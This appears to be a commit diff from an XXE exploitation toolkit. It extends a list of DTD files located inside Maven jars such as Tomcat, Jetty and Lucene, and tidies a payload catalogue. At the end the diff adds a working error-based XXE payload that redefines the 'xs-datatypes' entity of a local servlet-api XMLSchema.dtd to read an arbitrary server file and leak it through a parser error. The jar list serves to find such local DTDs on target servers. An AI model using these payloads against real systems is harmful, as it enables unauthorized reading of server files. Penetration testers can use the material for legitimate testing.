Improve the list for Maven jars.

Removing some duplicate payloads.

list/dtd_files_mvn_repo.txt

@@ -1,5 +1,7 @@
 /checkstyle/checkstyle/5.0/checkstyle-5.0.jar!/com/puppycrawl/tools/checkstyle/checks/imports/import_control_1_0.dtd
+/com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/docbook/calstblx.dtd
 /com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/docbook/docbookx.dtd
+/com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/docbook/soextblx.dtd
 /com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/xhtml/xhtml-1/xhtml1-frameset.dtd
 /com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/xhtml/xhtml-1/xhtml1-strict.dtd
 /com/openhtmltopdf/openhtmltopdf-core/0.0.1-RC9/openhtmltopdf-core-0.0.1-RC9.jar!/resources/schema/xhtml/xhtml-1/xhtml1-transitional.dtd
@@ -11,18 +13,28 @@
 /commons-digester/commons-digester/1.8.1/commons-digester-1.8.1.jar!/org/apache/commons/digester/xmlrules/digester-rules.dtd
 /commons-digester/commons-digester/2.0/commons-digester-2.0.jar!/org/apache/commons/digester/xmlrules/digester-rules.dtd
 /commons-digester/commons-digester/2.1/commons-digester-2.1.jar!/org/apache/commons/digester/xmlrules/digester-rules.dtd
+/javax/servlet/jsp/jsp-api/2.1/jsp-api-2.1.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/javax/servlet/jsp-api/2.0/jsp-api-2.0.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/javax/servlet/servlet-api/2.4/servlet-api-2.4.jar!/javax/servlet/resources/XMLSchema.dtd
+/javax/servlet/servlet-api/2.5/servlet-api-2.5.jar!/javax/servlet/resources/XMLSchema.dtd
 /jetty/org.mortbay.jetty/5.1.4/org.mortbay.jetty-5.1.4.jar!/org/mortbay/xml/configure_1_0.dtd
 /jetty/org.mortbay.jetty/5.1.4/org.mortbay.jetty-5.1.4.jar!/org/mortbay/xml/configure_1_1.dtd
 /jetty/org.mortbay.jetty/5.1.4/org.mortbay.jetty-5.1.4.jar!/org/mortbay/xml/configure_1_2.dtd
 /jetty/org.mortbay.jetty/5.1.4/org.mortbay.jetty-5.1.4.jar!/org/mortbay/xml/configure_1_3.dtd
 /org/apache/commons/commons-digester3/3.2/commons-digester3-3.2.jar!/org/apache/commons/digester3/xmlrules/digester-rules.dtd
 /org/apache/logging/log4j/log4j-core/2.3/log4j-core-2.3.jar!/Log4j-events.dtd
 /org/apache/logging/log4j/log4j-core/2.6/log4j-core-2.6.jar!/Log4j-events.dtd
+/org/apache/lucene/lucene-queryparser/4.5.1/lucene-queryparser-4.5.1.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/4.5.1/lucene-queryparser-4.5.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
+/org/apache/lucene/lucene-queryparser/5.5.0/lucene-queryparser-5.5.0.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/5.5.0/lucene-queryparser-5.5.0.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
+/org/apache/lucene/lucene-queryparser/6.5.0/lucene-queryparser-6.5.0.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/6.5.0/lucene-queryparser-6.5.0.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
+/org/apache/lucene/lucene-queryparser/6.6.0/lucene-queryparser-6.6.0.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/6.6.0/lucene-queryparser-6.6.0.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
+/org/apache/lucene/lucene-queryparser/6.6.1/lucene-queryparser-6.6.1.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/6.6.1/lucene-queryparser-6.6.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
+/org/apache/lucene/lucene-queryparser/7.6.0/lucene-queryparser-7.6.0.jar!/org/apache/lucene/queryparser/xml/LuceneContribQuery.dtd
 /org/apache/lucene/lucene-queryparser/7.6.0/lucene-queryparser-7.6.0.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
 /org/apache/struts/struts-core/1.3.10/struts-core-1.3.10.jar!/org/apache/struts/resources/struts-config_1_0.dtd
 /org/apache/struts/struts-core/1.3.10/struts-core-1.3.10.jar!/org/apache/struts/resources/struts-config_1_1.dtd
@@ -45,33 +57,59 @@
 /org/apache/tiles/tiles-core/3.0.5/tiles-core-3.0.5.jar!/org/apache/tiles/resources/tiles-config_3_0.dtd
 /org/apache/tiles/tiles-core/3.0.7/tiles-core-3.0.7.jar!/org/apache/tiles/resources/tiles-config_3_0.dtd
 /org/apache/tomcat/coyote/6.0.29/coyote-6.0.29.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/7.0.47/tomcat-embed-core-7.0.47.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/7.0.47/tomcat-embed-core-7.0.47.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/7.0.59/tomcat-embed-core-7.0.59.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/7.0.59/tomcat-embed-core-7.0.59.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/7.0.65/tomcat-embed-core-7.0.65.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/7.0.65/tomcat-embed-core-7.0.65.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.0.23/tomcat-embed-core-8.0.23.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.0.23/tomcat-embed-core-8.0.23.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.0.33/tomcat-embed-core-8.0.33-sources.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.0.33/tomcat-embed-core-8.0.33-sources.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.0.33/tomcat-embed-core-8.0.33.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.0.33/tomcat-embed-core-8.0.33.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.0.37/tomcat-embed-core-8.0.37.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.0.37/tomcat-embed-core-8.0.37.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.0.8/tomcat-embed-core-8.0.8.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.0.8/tomcat-embed-core-8.0.8.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.11/tomcat-embed-core-8.5.11.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.11/tomcat-embed-core-8.5.11.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.14/tomcat-embed-core-8.5.14.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.14/tomcat-embed-core-8.5.14.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.23/tomcat-embed-core-8.5.23.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.23/tomcat-embed-core-8.5.23.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.27/tomcat-embed-core-8.5.27.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.27/tomcat-embed-core-8.5.27.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.28/tomcat-embed-core-8.5.28.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.28/tomcat-embed-core-8.5.28.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.29/tomcat-embed-core-8.5.29.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.29/tomcat-embed-core-8.5.29.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/embed/tomcat-embed-core/8.5.4/tomcat-embed-core-8.5.4.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/embed/tomcat-embed-core/8.5.4/tomcat-embed-core-8.5.4.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/7.0.65/tomcat-embed-jasper-7.0.65.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/8.0.33/tomcat-embed-jasper-8.0.33.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/8.0.8/tomcat-embed-jasper-8.0.8.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/8.5.23/tomcat-embed-jasper-8.5.23.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/8.5.28/tomcat-embed-jasper-8.5.28.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/embed/tomcat-embed-jasper/8.5.4/tomcat-embed-jasper-8.5.4.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/apache/tomcat/jsp-api/6.0.14/jsp-api-6.0.14.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/apache/tomcat/jsp-api/6.0.18/jsp-api-6.0.18.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/apache/tomcat/jsp-api/6.0.29/jsp-api-6.0.29.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/apache/tomcat/servlet-api/6.0.14/servlet-api-6.0.14.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/apache/tomcat/servlet-api/6.0.18/servlet-api-6.0.18.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/apache/tomcat/servlet-api/6.0.29/servlet-api-6.0.29.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/tomcat/tomcat-coyote/7.0.47/tomcat-coyote-7.0.47.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
 /org/apache/tomcat/tomcat-coyote/7.0.59/tomcat-coyote-7.0.59.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
 /org/apache/tomcat/tomcat-coyote/8.5.19/tomcat-coyote-8.5.19.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
+/org/apache/tomcat/tomcat-jsp-api/7.0.47/tomcat-jsp-api-7.0.47.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/tomcat-jsp-api/7.0.59/tomcat-jsp-api-7.0.59.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/tomcat-jsp-api/7.0.65/tomcat-jsp-api-7.0.65.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/apache/tomcat/tomcat-jsp-api/8.5.19/tomcat-jsp-api-8.5.19.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/apache/tomcat/tomcat-servlet-api/7.0.47/tomcat-servlet-api-7.0.47.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/apache/tomcat/tomcat-servlet-api/7.0.59/tomcat-servlet-api-7.0.59.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/apache/tomcat/tomcat-servlet-api/7.0.65/tomcat-servlet-api-7.0.65.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/apache/tomcat/tomcat-servlet-api/8.5.19/tomcat-servlet-api-8.5.19.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/apache/xmlgraphics/batik-svg-dom/1.7/batik-svg-dom-1.7.jar!/org/apache/batik/dom/svg/resources/svg10.dtd
 /org/apache/xmlgraphics/batik-svg-dom/1.7/batik-svg-dom-1.7.jar!/org/apache/batik/dom/svg/resources/svg11-basic-flat.dtd
 /org/apache/xmlgraphics/batik-svg-dom/1.7/batik-svg-dom-1.7.jar!/org/apache/batik/dom/svg/resources/svg11-basic.dtd
@@ -82,19 +120,35 @@
 /org/apache/xmlgraphics/batik-svg-dom/1.7/batik-svg-dom-1.7.jar!/org/apache/batik/dom/svg/resources/svg12-flat.dtd
 /org/codehaus/castor/castor-xml/1.3.3/castor-xml-1.3.3.jar!/org/exolab/castor/dsml/schema/dsml.dtd
 /org/codehaus/castor/castor-xml/1.3.3/castor-xml-1.3.3.jar!/org/exolab/castor/util/resources/datatypes.dtd
+/org/codehaus/castor/castor-xml/1.3.3/castor-xml-1.3.3.jar!/org/exolab/castor/util/resources/structures.dtd
 /org/eclipse/jetty/jetty-xml/8.1.16.v20140903/jetty-xml-8.1.16.v20140903.jar!/org/eclipse/jetty/xml/configure_6_0.dtd
 /org/eclipse/jetty/jetty-xml/8.1.16.v20140903/jetty-xml-8.1.16.v20140903.jar!/org/eclipse/jetty/xml/configure_7_6.dtd
 /org/eclipse/jetty/jetty-xml/9.3.3.v20150827/jetty-xml-9.3.3.v20150827.jar!/org/eclipse/jetty/xml/configure_6_0.dtd
 /org/eclipse/jetty/jetty-xml/9.3.3.v20150827/jetty-xml-9.3.3.v20150827.jar!/org/eclipse/jetty/xml/configure_7_6.dtd
 /org/eclipse/jetty/jetty-xml/9.3.3.v20150827/jetty-xml-9.3.3.v20150827.jar!/org/eclipse/jetty/xml/configure_9_0.dtd
 /org/eclipse/jetty/jetty-xml/9.3.3.v20150827/jetty-xml-9.3.3.v20150827.jar!/org/eclipse/jetty/xml/configure_9_3.dtd
+/org/eclipse/jetty/toolchain/jetty-schemas/3.1/jetty-schemas-3.1.jar!/javax/servlet/jsp/resources/jspxml_2_0.dtd
+/org/eclipse/jetty/toolchain/jetty-schemas/3.1/jetty-schemas-3.1.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/eclipse/jetty/toolchain/jetty-schemas/3.1.M0/jetty-schemas-3.1.M0.jar!/javax/servlet/jsp/resources/jspxml_2_0.dtd
+/org/eclipse/jetty/toolchain/jetty-schemas/3.1.M0/jetty-schemas-3.1.M0.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/jboss/spec/javax/servlet/jboss-servlet-api_3.1_spec/1.0.0.Final/jboss-servlet-api_3.1_spec-1.0.0.Final.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/mortbay/jetty/jetty/6.1.14/jetty-6.1.14.jar!/org/mortbay/xml/configure_6_0.dtd
 /org/mortbay/jetty/jetty/6.1.19/jetty-6.1.19.jar!/org/mortbay/xml/configure_6_0.dtd
 /org/mortbay/jetty/jetty/6.1.25/jetty-6.1.25.jar!/org/mortbay/xml/configure_6_0.dtd
 /org/mortbay/jetty/jetty/6.1.26/jetty-6.1.26.jar!/org/mortbay/xml/configure_6_0.dtd
 /org/mortbay/jetty/jetty/6.1.5/jetty-6.1.5.jar!/org/mortbay/xml/configure_6_0.dtd
+/org/mortbay/jetty/jsp-api-2.1-glassfish/2.1.v20091210/jsp-api-2.1-glassfish-2.1.v20091210.jar!/javax/servlet/jsp/resources/jspxml_2_0.dtd
+/org/mortbay/jetty/jsp-api-2.1-glassfish/9.1.1.B60.25.p0/jsp-api-2.1-glassfish-9.1.1.B60.25.p0.jar!/javax/servlet/jsp/resources/jspxml_2_0.dtd
+/org/mortbay/jetty/servlet-api/2.5-20081211/servlet-api-2.5-20081211.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/mortbay/jetty/servlet-api/2.5-20081211/servlet-api-2.5-20081211.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/mortbay/jetty/servlet-api-2.5/6.1.14/servlet-api-2.5-6.1.14.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/mortbay/jetty/servlet-api-2.5/6.1.14/servlet-api-2.5-6.1.14.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/mortbay/jetty/servlet-api-2.5/6.1.5/servlet-api-2.5-6.1.5.jar!/javax/servlet/resources/XMLSchema.dtd
+/org/mortbay/jetty/servlet-api-2.5/6.1.5/servlet-api-2.5-6.1.5.jar!/javax/servlet/jsp/resources/jspxml.dtd
+/org/seleniumhq/selenium/selenium-server-standalone/2.46.0/selenium-server-standalone-2.46.0.jar!/javax/servlet/jsp/resources/jspxml.dtd
 /org/seleniumhq/selenium/selenium-server-standalone/2.46.0/selenium-server-standalone-2.46.0.jar!/org/seleniumhq/jetty7/xml/configure_6_0.dtd
 /org/seleniumhq/selenium/selenium-server-standalone/2.46.0/selenium-server-standalone-2.46.0.jar!/org/seleniumhq/jetty7/xml/configure_7_6.dtd
+/org/seleniumhq/selenium/selenium-server-standalone/2.46.0/selenium-server-standalone-2.46.0.jar!/javax/servlet/resources/XMLSchema.dtd
 /org/sonarsource/xml/sonar-xml-plugin/1.4.3.1027/sonar-xml-plugin-1.4.3.1027.jar!/org/sonar/plugins/xml/dtd/xhtml1/xhtml1-frameset.dtd
 /org/sonarsource/xml/sonar-xml-plugin/1.4.3.1027/sonar-xml-plugin-1.4.3.1027.jar!/org/sonar/plugins/xml/dtd/xhtml1/xhtml1-strict.dtd
 /org/sonarsource/xml/sonar-xml-plugin/1.4.3.1027/sonar-xml-plugin-1.4.3.1027.jar!/org/sonar/plugins/xml/dtd/xhtml1/xhtml1-transitional.dtd

list/xxe_payloads.md

@@ -46,9 +46,6 @@
 
  --- 
 
-
-
-
 **DTD File:** `/usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd`
 
 **Injectable entity:** `%URI`
@@ -72,7 +69,6 @@
 
  --- 
 
-
 **DTD File:** `/usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd`
 
 **Injectable entity:** `%Boolean`
@@ -510,3 +506,28 @@
 ]>
 <message></message>
 ```
+
+ --- 
+
+**DTD File:** `/usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd`
+
+**Injectable entity:** `xs-datatypes`
+
+**XXE Payload:**
+```
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd">
+
+    <!ENTITY % xs-datatypes '
+        <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        '>
+
+    %local_dtd;
+]>
+<message></message>
+```
+
+ ---